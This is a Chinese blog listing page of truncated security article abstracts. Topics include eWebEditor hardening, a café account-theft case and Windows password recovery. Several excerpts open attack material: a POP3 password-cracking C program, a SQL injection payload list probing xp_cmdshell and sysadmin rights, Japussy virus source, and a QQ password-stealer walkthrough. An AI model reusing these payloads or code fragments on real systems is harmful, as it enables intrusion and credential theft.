摘要:
入侵者根据ewebeditor目前存在的漏洞。进行上传ASP木马。如何得到webshell这里我就不多讲了。以下为解决方案: 一.首先我们进入目录-/manage/Editor 进行修改删除等不必要的文件.以做安全. 1.删除文件名如下. Admin_Login.asp. Admin_Default.asp Admin_Decode.asp Admin_ModiPwd.asp Admin_Private.asp Admin_Style.asp Admin目录文件 2.修改文件 Upload.asp 找到语句. ’ 任何情况下都不允许上传asp脚本文件 sAllowExt = Replace(U 阅读全文
摘要:
做网吧老板,可要关好网络后门了!日前,郫县公安局就破获了一个案子,两小伙里应外合,专偷网吧的虚拟物品来卖,涉案一万多元!警方介绍,他们中的一人来到网吧,对在外的黑客同伙打开接受远程协助功能,精通IT技术的黑客利用网吧服务器漏洞,窃取账号密码,用其充值平台上的钱购买点卡、Q币等,然后出售牟利。网吧账户频频失窃 民警介入调查 6月下旬的一天早晨,郫县龙腾网吧老板赵女士突然接到网吧雇员的电话,说前一天刚充过值的网上充值平台里竟然一分钱都没有了,这让她非常诧异。赵女士说,网上充值平台相当于游戏点卡、Q币等的销售平台,网吧每次通过销售代理往里面充值2000元,再卖给有需要的网吧上网用户。 “上网的人.. 阅读全文
摘要:
主要解决两个问题:1.PE或dos认不到硬盘2.net user 命令不成功SATA的硬盘可能会让你的PE找不到,方法是修改BIOS中的SATA设定,找到后把后面的AHCI改成RAD(好像是这个名,基本就是上下选择,选择不是AHCI的那个值),有些硬盘值可能是IDE,具体不同的硬盘不同修改值。然后保存退出,这样再用PE系统或者dos就能认到硬盘了,为下面的修改文件做好准备。注意,修改后直接进入系统可能会导致蓝屏,但是没有关系,我们可以先做修改文件,回头再把SATA的设定改回AHCI,再正常进入系统即可。关于如何操作,以下地址有详细说明,我COPY一下,图片大家点链接过去看吧,呃,下面有些内容还 阅读全文
摘要:
AS/400 FTP是一个很难完全搞懂的问题,因此在TechTarget的IT Knowledge Exchange(ITKE)上经常会有人提问。负责FTP安装和AS/400服务器通讯环境(正式改名为“IBM iSeries”)的广域网工程师,当他们需要在WAN上FTP文件时,会发现这篇文章很有用。问:AS/400服务器如何对FTP服务器可见?答:首先,你要从你的服务提供商那得到一个外部IP地址,然后你必须在防火墙上设置好映射IP地址。只要AS/400有一个能够工作的默认路由,那么FTP服务器就可以使用外部IP地址访问AS/400。另外,如果AS/400是客户端,你需要通过命令行运行FTP来连 阅读全文
摘要:
OICQShield等),还有拒绝服务攻击(DDoS等)、IP欺骗攻击、Web欺骗、DNS欺骗攻击等等,简直比古龙小说里的十大恶人还要可恶。让我们回过头再看看黑客们是怎么攻击的,同时我们又应该如何拿起身边的武器,奋起反抗。1.混水摸鱼VS釜底抽薪黑客们可能会在你的机器上启动一个伪造系统登录界面的程序,来进行狸猫换太子。不明底细的你多半会误入这个“贼窝”,当你在这个伪装的界面上输入用户名、密码以后,该伪登录程序会在后台把你录入的机密信息偷偷地传送到黑客们的机器上,然后提示一个出错信息说“用户名与密码不符,请重新登录”。此后,才会出现真正的登录界面。怎么样,可怕吧?应对方法就是釜底抽薪,强制在登录 阅读全文
摘要:
说明:1,本程序仅供学习参考使用。严禁使用本程序进行盗取他人密码的活动。2,-i 选项不好使(只能使用server name,如:pop3.dudu.com)。3,本程序仅对某些pop3服务器有效。未加修改,高手多多指教。#include#include#include#include#include#include#include#include#include#define BUFMAX 255#define PORT_NO 110#define SER_IP 1#define USR_NAME 2#define DIC_FNAME 4#define GET_SER_IP(x)\(((x) 阅读全文
摘要:
主要代码分析如下: //根据进程ID得到进程名称 BOOL processIdToName(LPTSTR lpszProcessName, DWORD PID) { HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); PROCESSENTRY32 pe; pe.dwSize = sizeof(PROCESSENTRY32); if (!Process32First(hSnapshot, &pe)) { return FALSE; } while (Process32Next(hSnapshot, &am 阅读全文
摘要:
1. and 1=1 and 1=22. and user>0 and db_name()>0 and @@version>0 and 1=(select IS_SRVROLEMEMBER('sysadmin')) and 'sa'=(select system_user) and 1=(select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell') and 1=(select count(*) from mas 阅读全文
摘要:
分享一下。但注明:提供只用于学习编程。为了安全起见,已修改一处。HeaderSize = 38912; //Upx压缩过病毒体的大小 IconOffset = $92BC; //Upx压缩过PE文件主图标的偏移量 //Upx 1.24W 用法: upx -9 --8086 Japussy.exe} IconSize = $2E8; //PE文件主图标的大小--744字节 IconTail = IconOffset + IconSize; //PE文件主图标的尾部 ID = $44444444; //感染标记 //垃圾码,以备写入 Catchword = 'If a race need 阅读全文
摘要:
经常有听到有朋友QQ被盗的消息,总感觉做出这种行为的人是可鄙的,不就是对QQ窗口进行监视,然后再是记录用户输入的号码和密码,认为没什么了不起。对于Windows核心编程,本人还是一只菜鸟,前一段时间把《Windows系统编程》粗略的看一边(当然重点地方仔细的看),由于对于C++有点基础,感觉学起来比较容易上手。但到了这两天真正实践的时候,遇到了各种各样的问题。即使一个小小的问题都足以让我这只菜鸟郁闷老半天。直到此时,在完成这个软件的时候,整理一下思路,不但算是给自己个总结,也跟像我一样的菜鸟们分享一下自己的经验。想必大家都已经知道,这类软件的特点就是在用户不知不觉的时候工作。在任务管理器中是. 阅读全文